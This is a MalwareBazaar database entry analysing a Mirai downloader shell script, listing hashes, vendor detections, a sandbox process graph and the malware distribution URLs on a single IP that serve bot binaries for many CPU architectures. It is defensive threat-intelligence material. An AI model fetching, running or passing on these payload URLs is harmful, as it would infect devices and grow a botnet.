MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 d3e4108a9092e282ca4b45c34dc00b84d19205f145f616c9d7014ea9acf0b57a. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 7


Intelligence 7 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: d3e4108a9092e282ca4b45c34dc00b84d19205f145f616c9d7014ea9acf0b57a
SHA3-384 hash: ab38e0cd1a9a3efcd221bb9f4cbcacfb79f87e347e1de838aca326caf21070da2864dca7f3cdc609b2897856fd6e2674
SHA1 hash: f93bdc5bf970c38b72de58f5d7c6efc26d6030ec
MD5 hash: 6993fea956e1fb0383ce369ca0ebf325
humanhash: south-angel-tennessee-ohio
File name:curl.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:965 bytes
First seen:2025-06-18 22:37:51 UTC
Last seen:2025-06-18 23:12:01 UTC
File type: sh
MIME type:text/plain
ssdeep 24:3J3Mcs+SokcsTSDPcsZNIxSyKcsFSIKxhcsATucsA+qcsAokGcsIRBWR/WRCcs9D:qd+SokdTSDPdKSyKdFSIShdATudA+qdb
TLSH T11711BF9C10D0724E5B2DCFCBB25E83086E40CAD4B0FD9A96AA380733949F110B839B1A
Magika shell
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://103.149.252.178/bot.arm93eb8e223410f702c1be6d9388205a25066cd8ee5c669e1e0954eed51b61d99c Miraielf mirai ua-wget
http://103.149.252.178/bot.arm567ba445f4d39c217eb3911c0b41ed7e4ca87c175535b1f08501e8d157c2bbd26 Miraielf mirai ua-wget
http://103.149.252.178/bot.arm661f1709d5d81bc6a521d005312751b7cfa5e5efa4a87b36c78d1df6a56166243 Miraielf mirai ua-wget
http://103.149.252.178/bot.arm799145d8a8d2bd7a401a9fac5ffc9413987eb507fd8f35b0be2d1641f285f4baa Miraielf mirai ua-wget
http://103.149.252.178/bot.m68k269ee46bd65dd8c96ad5ea5872ba50f12572714521430f410e73046afc372cee Miraielf mirai ua-wget
http://103.149.252.178/bot.mipse3b227f81a4eb81c43b5764316f3632fd41367cbb0706951b2375f43f906e8ff Miraielf mirai ua-wget
http://103.149.252.178/bot.mpsl9f1f56a03f2046fa18c79a9505f2a9fbb5272549da3eb9507b3495602246be54 Miraielf mirai ua-wget
http://103.149.252.178/bot.powerpcn/an/an/a
http://103.149.252.178/bot.sh4db65c6ad097c998d7cab2fd9bce177aa17f74a8179ac36a67c62f845285612b0 Miraielf mirai ua-wget
http://103.149.252.178/bot.x864427f663b9ef45d01d7925efe57d5670b5e27efc3e35c61abdda4786b681066d Miraielf mirai ua-wget
http://103.149.252.178/bot.x86_64dcf79d68228bb95fe49c4e3a9d0167aaef4abd8946bae55855d825b68b19cc26 Miraielf mirai ua-wget
http://103.149.252.178/bot.x86_32n/an/an/a

Intelligence

File Origin
# of uploads :
2
# of downloads :
114
Origin country :
DE DE
Vendor Threat Intelligence
Detection(s):
SecuriteInfo.com.Linux.Downloader-33.UNOFFICIAL
Create hunting rule

Sanesecurity.Malware.30762.LX.BOT.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
94.9%
Link:
https://cyber-fortress.com/docs/result/index.php?id=6853de69d1262bb4773b1ec9linux22vpnfull_triage
Tags:
downloader trojan agent
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Link:
https://www.filescan.io/uploads/68534068cf2af157111171f2/reports/b8a6c6e6-66a3-4d0f-8d6b-c4b90a9f0111/overview
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/cb19e176-994a-40b6-9a5b-94e99e530a1d
Behavior Graph:
Download SVG
%3 guuid=31ce70d5-1900-0000-0bad-b0338d0a0000 pid=2701 /usr/bin/sudo guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710 /tmp/sample.bin guuid=31ce70d5-1900-0000-0bad-b0338d0a0000 pid=2701->guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710 execve guuid=f792d8d7-1900-0000-0bad-b033980a0000 pid=2712 /usr/bin/curl net send-data guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=f792d8d7-1900-0000-0bad-b033980a0000 pid=2712 execve guuid=d205c91e-1a00-0000-0bad-b0334a0b0000 pid=2890 /usr/bin/chmod guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=d205c91e-1a00-0000-0bad-b0334a0b0000 pid=2890 execve guuid=5cfa071f-1a00-0000-0bad-b0334c0b0000 pid=2892 /usr/bin/dash guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=5cfa071f-1a00-0000-0bad-b0334c0b0000 pid=2892 clone guuid=faa80c1f-1a00-0000-0bad-b0334d0b0000 pid=2893 /usr/bin/curl net send-data guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=faa80c1f-1a00-0000-0bad-b0334d0b0000 pid=2893 execve guuid=dbe8e064-1a00-0000-0bad-b033e40b0000 pid=3044 /usr/bin/chmod guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=dbe8e064-1a00-0000-0bad-b033e40b0000 pid=3044 execve guuid=b28b2465-1a00-0000-0bad-b033e60b0000 pid=3046 /usr/bin/dash guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=b28b2465-1a00-0000-0bad-b033e60b0000 pid=3046 clone guuid=d8cd3165-1a00-0000-0bad-b033e70b0000 pid=3047 /usr/bin/curl net send-data guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=d8cd3165-1a00-0000-0bad-b033e70b0000 pid=3047 execve guuid=954eafad-1a00-0000-0bad-b0336e0c0000 pid=3182 /usr/bin/chmod guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=954eafad-1a00-0000-0bad-b0336e0c0000 pid=3182 execve guuid=f4cb0cae-1a00-0000-0bad-b0336f0c0000 pid=3183 /usr/bin/dash guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=f4cb0cae-1a00-0000-0bad-b0336f0c0000 pid=3183 clone guuid=178d21ae-1a00-0000-0bad-b033700c0000 pid=3184 /usr/bin/curl net send-data guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=178d21ae-1a00-0000-0bad-b033700c0000 pid=3184 execve guuid=fc2fcff6-1a00-0000-0bad-b033bf0c0000 pid=3263 /usr/bin/chmod guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=fc2fcff6-1a00-0000-0bad-b033bf0c0000 pid=3263 execve guuid=515b33f7-1a00-0000-0bad-b033c00c0000 pid=3264 /usr/bin/dash guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=515b33f7-1a00-0000-0bad-b033c00c0000 pid=3264 clone guuid=701843f7-1a00-0000-0bad-b033c10c0000 pid=3265 /usr/bin/curl net send-data guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=701843f7-1a00-0000-0bad-b033c10c0000 pid=3265 execve guuid=d11b8541-1b00-0000-0bad-b033580d0000 pid=3416 /usr/bin/chmod guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=d11b8541-1b00-0000-0bad-b033580d0000 pid=3416 execve guuid=15c5e341-1b00-0000-0bad-b0335a0d0000 pid=3418 /usr/bin/dash guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=15c5e341-1b00-0000-0bad-b0335a0d0000 pid=3418 clone guuid=8ebaf541-1b00-0000-0bad-b0335b0d0000 pid=3419 /usr/bin/curl net send-data guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=8ebaf541-1b00-0000-0bad-b0335b0d0000 pid=3419 execve guuid=7dc6cac0-1b00-0000-0bad-b033690e0000 pid=3689 /usr/bin/chmod guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=7dc6cac0-1b00-0000-0bad-b033690e0000 pid=3689 execve guuid=d4d529c1-1b00-0000-0bad-b0336a0e0000 pid=3690 /usr/bin/dash guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=d4d529c1-1b00-0000-0bad-b0336a0e0000 pid=3690 clone guuid=471f3cc1-1b00-0000-0bad-b0336e0e0000 pid=3694 /usr/bin/curl net send-data guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=471f3cc1-1b00-0000-0bad-b0336e0e0000 pid=3694 execve guuid=4a01773d-1c00-0000-0bad-b033f00f0000 pid=4080 /usr/bin/chmod guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=4a01773d-1c00-0000-0bad-b033f00f0000 pid=4080 execve guuid=c1abd83d-1c00-0000-0bad-b033f40f0000 pid=4084 /usr/bin/dash guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=c1abd83d-1c00-0000-0bad-b033f40f0000 pid=4084 clone guuid=6feae63d-1c00-0000-0bad-b033f50f0000 pid=4085 /usr/bin/curl net send-data guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=6feae63d-1c00-0000-0bad-b033f50f0000 pid=4085 execve guuid=e667db5d-1c00-0000-0bad-b0335e100000 pid=4190 /usr/bin/chmod guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=e667db5d-1c00-0000-0bad-b0335e100000 pid=4190 execve guuid=9ade1e5e-1c00-0000-0bad-b03360100000 pid=4192 /usr/bin/dash guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=9ade1e5e-1c00-0000-0bad-b03360100000 pid=4192 clone guuid=86a4245e-1c00-0000-0bad-b03361100000 pid=4193 /usr/bin/curl net send-data guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=86a4245e-1c00-0000-0bad-b03361100000 pid=4193 execve guuid=2d0397bc-1c00-0000-0bad-b033b9110000 pid=4537 /usr/bin/chmod guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=2d0397bc-1c00-0000-0bad-b033b9110000 pid=4537 execve guuid=7fa6ddbc-1c00-0000-0bad-b033bd110000 pid=4541 /usr/bin/dash guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=7fa6ddbc-1c00-0000-0bad-b033bd110000 pid=4541 clone guuid=f878edbc-1c00-0000-0bad-b033be110000 pid=4542 /usr/bin/curl net send-data guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=f878edbc-1c00-0000-0bad-b033be110000 pid=4542 execve guuid=a5ed4b11-1d00-0000-0bad-b03398120000 pid=4760 /usr/bin/chmod guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=a5ed4b11-1d00-0000-0bad-b03398120000 pid=4760 execve guuid=cc01df11-1d00-0000-0bad-b0339a120000 pid=4762 /usr/bin/dash guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=cc01df11-1d00-0000-0bad-b0339a120000 pid=4762 clone guuid=4cd9ea11-1d00-0000-0bad-b0339c120000 pid=4764 /usr/bin/curl net send-data guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=4cd9ea11-1d00-0000-0bad-b0339c120000 pid=4764 execve guuid=79b3ff81-1d00-0000-0bad-b033ae130000 pid=5038 /usr/bin/chmod guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=79b3ff81-1d00-0000-0bad-b033ae130000 pid=5038 execve guuid=65dc7482-1d00-0000-0bad-b033af130000 pid=5039 /usr/bin/dash guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=65dc7482-1d00-0000-0bad-b033af130000 pid=5039 clone guuid=6fba8c82-1d00-0000-0bad-b033b0130000 pid=5040 /usr/bin/curl net send-data guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=6fba8c82-1d00-0000-0bad-b033b0130000 pid=5040 execve guuid=3cd439a3-1d00-0000-0bad-b03303140000 pid=5123 /usr/bin/chmod guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=3cd439a3-1d00-0000-0bad-b03303140000 pid=5123 execve guuid=33a2bba3-1d00-0000-0bad-b03305140000 pid=5125 /usr/bin/dash guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=33a2bba3-1d00-0000-0bad-b03305140000 pid=5125 clone guuid=0a90c3a3-1d00-0000-0bad-b03306140000 pid=5126 /usr/bin/rm delete-file guuid=d12796d7-1900-0000-0bad-b033960a0000 pid=2710->guuid=0a90c3a3-1d00-0000-0bad-b03306140000 pid=5126 execve b95ce511-3591-5114-995b-9ce77bb440cb 103.149.252.178:80 guuid=f792d8d7-1900-0000-0bad-b033980a0000 pid=2712->b95ce511-3591-5114-995b-9ce77bb440cb send: 86B guuid=faa80c1f-1a00-0000-0bad-b0334d0b0000 pid=2893->b95ce511-3591-5114-995b-9ce77bb440cb send: 87B guuid=d8cd3165-1a00-0000-0bad-b033e70b0000 pid=3047->b95ce511-3591-5114-995b-9ce77bb440cb send: 87B guuid=178d21ae-1a00-0000-0bad-b033700c0000 pid=3184->b95ce511-3591-5114-995b-9ce77bb440cb send: 87B guuid=701843f7-1a00-0000-0bad-b033c10c0000 pid=3265->b95ce511-3591-5114-995b-9ce77bb440cb send: 87B guuid=8ebaf541-1b00-0000-0bad-b0335b0d0000 pid=3419->b95ce511-3591-5114-995b-9ce77bb440cb send: 87B guuid=471f3cc1-1b00-0000-0bad-b0336e0e0000 pid=3694->b95ce511-3591-5114-995b-9ce77bb440cb send: 87B guuid=6feae63d-1c00-0000-0bad-b033f50f0000 pid=4085->b95ce511-3591-5114-995b-9ce77bb440cb send: 90B guuid=86a4245e-1c00-0000-0bad-b03361100000 pid=4193->b95ce511-3591-5114-995b-9ce77bb440cb send: 86B guuid=f878edbc-1c00-0000-0bad-b033be110000 pid=4542->b95ce511-3591-5114-995b-9ce77bb440cb send: 86B guuid=4cd9ea11-1d00-0000-0bad-b0339c120000 pid=4764->b95ce511-3591-5114-995b-9ce77bb440cb send: 89B guuid=6fba8c82-1d00-0000-0bad-b033b0130000 pid=5040->b95ce511-3591-5114-995b-9ce77bb440cb send: 89B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/d3e4108a9092e282ca4b45c34dc00b84d19205f145f616c9d7014ea9acf0b57a
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/d3e4108a9092e282ca4b45c34dc00b84d19205f145f616c9d7014ea9acf0b57a/
Threat name:
Linux.Trojan.Vigorf
Create hunting rule
Status:
Malicious
First seen:
2025-06-18 22:42:09 UTC
File Type:
Text (Shell)
AV detection:
13 of 24 (54.17%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=2psbbcuqslrifsslixbu3qalqtizebprix3bnsoxafhktlhqwv5a._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/250618-2lt8dawyat/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/d3e4108a9092e282ca4b45c34dc00b84d19205f145f616c9d7014ea9acf0b57a

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh d3e4108a9092e282ca4b45c34dc00b84d19205f145f616c9d7014ea9acf0b57a

(this sample)

Mirai

elf 954e7d8fa1f392c67571519103a4373dfb924b3f79943bf0a1d54d79089cca1a

  
URLhaus
https://urlhaus.abuse.ch/url/3561452/
  
Delivery method
Distributed via web download
  
URLhaus
https://urlhaus.abuse.ch/url/3561022/
  
Dropping
MD5 eb00c0586aa43a9523c032a094eac5f6
  
Dropping
SHA256 954e7d8fa1f392c67571519103a4373dfb924b3f79943bf0a1d54d79089cca1a

Comments